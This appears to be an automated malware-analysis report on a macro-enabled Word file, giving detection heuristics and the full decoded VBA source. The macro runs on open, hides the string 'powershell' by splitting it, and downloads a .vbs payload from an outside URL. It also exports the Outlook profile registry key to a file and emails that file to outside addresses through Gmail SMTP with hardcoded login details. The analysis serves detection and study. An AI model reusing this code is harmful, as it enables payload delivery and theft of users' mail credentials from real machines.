Verdict: MALICIOUS
Risk Score: 402

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains VBA macros that use WScript.Shell to execute commands. The macro obfuscates the string 'powershell' and constructs a command that downloads a file from 'http://tiny.cc/zw0npy' using Invoke-WebRequest, saving it as a .vbs file in the user's profile directory. This indicates downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Dropper.Agent-7144189-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7144189-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  `Download = FileName7 & " Invoke-WebRequest -Uri ""http://tiny.cc/zw0npy"" -OutFile " & FileName5 ExecDown = Shell(Download, 0) 'Substitution = "SchTasks /Create /TN " & TempCopy & " /TR " & FileName5 & " /SC MINUTE /mo 10 /F"`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:
  `Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")`
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script:
  `Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")`
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script:
  `Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  `Loop Set oShell = CreateObject("WScript.Shell") strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")`
- cmd.exe reference in VBA (high, OLE_VBA_CMD). Matched line in script:
  `For Each strRegPath In arrRegPaths strCommand = "cmd /c REG EXPORT """ & strRegPath & """ """ & Replace(strRegPath, "\", "_") & ".txt""" objShell.Run strCommand, 0, True`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://tiny.cc/zw0npy (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/sendusing (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/smtpserver (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/smtpauthenticate (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/sendusername (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/sendpassword (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/smtpserverport (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/smtpusessl (referenced by macro)
  - http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5678 bytes | 06682bf7bf62e45659d6a5f9706a1a571bc3a50c29d01b10e36bf7ba04a0070d |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec()
Dim CharacterSetArray, i, j, Count, Chars, Index, Temp, TempCopy
CharacterSetArray = Array(Array(7, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), Array(1, "0123456789"))
For i = 0 To UBound(CharacterSetArray)
Count = CharacterSetArray(i)(0)
Chars = CharacterSetArray(i)(1)
For j = 1 To Count
Index = Int(Rnd() * Len(Chars)) + 1
Temp = Temp & Mid(Chars, Index, 1)
Next
Next
Do Until Len(Temp) = 0
Index = Int(Rnd() * Len(Temp)) + 1
TempCopy = TempCopy & Mid(Temp, Index, 1)
Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
Loop
Set oShell = CreateObject("WScript.Shell")
strProFolder = oShell.ExpandEnvironmentStrings("%UserProfile%")
FileName2 = strProFolder & "\" & TempCopy & ".e" & "x" & "e"
FileName5 = strProFolder & "\" & TempCopy & ".v" & "b" & "s"
FileName = strDrivFolder & "\W" & "i" & "nd" & "ow" & "s\sy" & "stem" & "3" & "2" & "\W" & "ind" & "ow" & "sP" & "owerSh" & "e" & "ll\v" & "1" & ".0\p" & "ower" & "s" & "he" & "ll." & "e" & "x" & "e"
FileName7 = "po" & "we" & "rsh" & "el" & "l"
Download = FileName7 & " Invoke-WebRequest -Uri ""http://tiny.cc/zw0npy"" -OutFile " & FileName5
ExecDown = Shell(Download, 0)
'Substitution = "SchTasks /Create /TN " & TempCopy & " /TR " & FileName5 & " /SC MINUTE /mo 10 /F"
'ExecSub = Shell(Substitution, 0)
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
arrRegPaths = Array("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook")
Const intForReading = 1
Const intUnicode = -1
strFileName = objShell.ExpandEnvironmentStrings("%UserProfile%") & "\Register.txt"
strHomeFolder = objShell.ExpandEnvironmentStrings("%ComputerName%")
Set objRegFile = objFSO.CreateTextFile(strFileName, True, True)
objRegFile.WriteLine "Windows Registry Editor Version 5.00"
For Each strRegPath In arrRegPaths
strCommand = "cmd /c REG EXPORT """ & strRegPath & """ """ & Replace(strRegPath, "\", "_") & ".txt"""
objShell.Run strCommand, 0, True
If objFSO.FileExists(Replace(strRegPath, "\", "_") & ".txt") = True Then
'WScript.Sleep 10000 ' Wait one second to give the file time to close
Set objInputFile = objFSO.OpenTextFile(Replace(strRegPath, "\", "_") & ".txt", intForReading, False, intUnicode)
If Not objInputFile.AtEndOfStream Then
objInputFile.SkipLine
objRegFile.Write objInputFile.ReadAll
End If
objInputFile.Close
Set objInputFile = Nothing
objFSO.DeleteFile Replace(strRegPath, "\", "_") & ".txt", True
End If
Next
objRegFile.Close
Set objRegFile = Nothing
ASDJFioegnr = strHomeFolder
eiehovhreuib = strFileName
FIDFndnrubgFIDFndnrubg = "ocme" & " xport"
FIDFndnrubgFIDFndnrubg = FIDFndnrubgFIDFndnrubg + "s@" & "g" & "mai"
DGHIhgnsjkfdgDGHIhgnsjkfdg = "ocm"
Const yuvehbrDGIRG = "Yail"
KGIGAjdgkg = "sout" & "hgatel"
KGIGAjdgkg = KGIGAjdgkg + "lp@p" & "rotonm"
KGIGAjdgkg = KGIGAjdgkg + "ail.ch;s" & "outhgat"
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "e"
Const dkfjgaeguGJd = "sm" & "tp.g" & "ma" & "il" & ".co" & "m"
Const fhdfjkHJHJd = True
Const DSFJTAJPdjgkfd = 465
HJfefwenksdaHJfefwenksdaJfefwenksda = "oc" & "mexp"
HJfefwenksdaHJfefwenksdaJfefwenksda = HJfefwenksdaHJfefwenksdaJfefwenksda + "ort" & "s@" & "gm"
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "xpor"
Const cdoSendUsingPickup = 1
Const cdoSendUsingPort = 2
Const cdoAnonymous = 0
Const cdoBasic = 1
DGHIhgnsjkfdgDGHIhgnsjkfdg = DGHIhgnsjkfdgDGHIhgnsjkfdg + "ts" & "1"
HJfefwenksdaHJfefwenksdaJfefwenksda = HJfefwenksdaHJfefwenksdaJfefwenksda + "ail.c" & "om"
KGIGAjdgkg = KGIGAjdgkg + "ellp@yan" & "dex.c" & "om"
FIDFndnrubgFIDFndnrubg = FIDFndnrubgFIDFndnrubg + "l.c" & "o" & "m"
Const cdoNTLM = 2
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = ASDJFioegnr
objMessage.From = """" & yuvehbrDGIRG & """ <" & FIDFndnrubgFIDFndnrubg & ">"
objMessage.To = KGIGAjdgkg
objMessage.TextBody = eiehovhreuib
objMessage.AddAttachment strFileName
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = dkfjgaeguGJd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = cdoBasic
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = HJfefwenksdaHJfefwenksdaJfefwenksda
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = DGHIhgnsjkfdgDGHIhgnsjkfdg
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = DSFJTAJPdjgkfd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = fhdfjkHJHJd
objMessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
objMessage.Configuration.Fields.Update
On Error Resume Next
objMessage.Send
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 16384 bytes | 71f99026e324b73dee4f22c58bb7f2e3a81679fcc647d69807e1a5cc7ffbbee8 |